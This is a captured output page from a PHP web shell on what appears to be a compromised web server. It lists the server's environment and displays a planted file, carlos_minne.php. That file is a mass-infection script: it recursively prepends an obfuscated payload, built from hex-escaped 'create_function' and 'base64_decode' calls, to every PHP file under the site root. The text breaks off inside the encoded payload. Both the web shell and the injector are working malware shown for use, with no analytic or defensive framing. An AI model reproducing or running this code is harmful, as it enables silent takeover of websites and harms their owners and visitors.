403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/fundingapplications.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/fundingapplications.com/carlos_minne.php
<?
set_time_limit(0);

function do_it($f,$inj){

	global 	$totalinjected;


	$c = file_get_contents($f);

	if (stristr($c,"zend")) return;

	if (stristr($c,"ioncube")) return;

	$s1=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(47).chr(42).chr(42).chr(47);

	$s3=substr($c,0,10);

	$s2=chr(63).chr(62);


	if ($s3==$s1){

		$k=strpos($c,$s2);

		$k=$k+2;

		$c=substr($c,$k);

	}


	$c = $inj.$c;

	$h2 = @fopen ($f, "w");
	
	@fwrite($h2, $c);
	
	@fclose($h2); 


	$totalinjected++;

	return 0;
}

function do_folder($dir){

	global $encoded;

	$folders=array();

	if (is_dir($dir)) {

		if ($dh = opendir($dir)) {

			while (($file = readdir($dh)) !== false) {

				if (($file==".")||($file==".."))continue;

				
				$k=$dir."/".$file;

				if (is_dir($k)){

					array_push($folders,$k);

				}else{

					if (is_file($k)){

						$ext=explode(".",$k);

						$c=count($ext)-1;

						if (strtolower($ext[$c])=="php"){

							do_it($k,$encoded."\n");

						}

					}


				}

			}

			@closedir($dh);

		}

	}

	reset($folders);

	foreach($folders as $k){

		echo "Going subfolder $k\n";

		do_folder($k);

	}
	
	return 0;
	
}


$z=$_SERVER["DOCUMENT_ROOT"];

$encoded='<'.'?php /**/ $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7b

Youez - 2016 - github.com/yon3zu
LinuXploit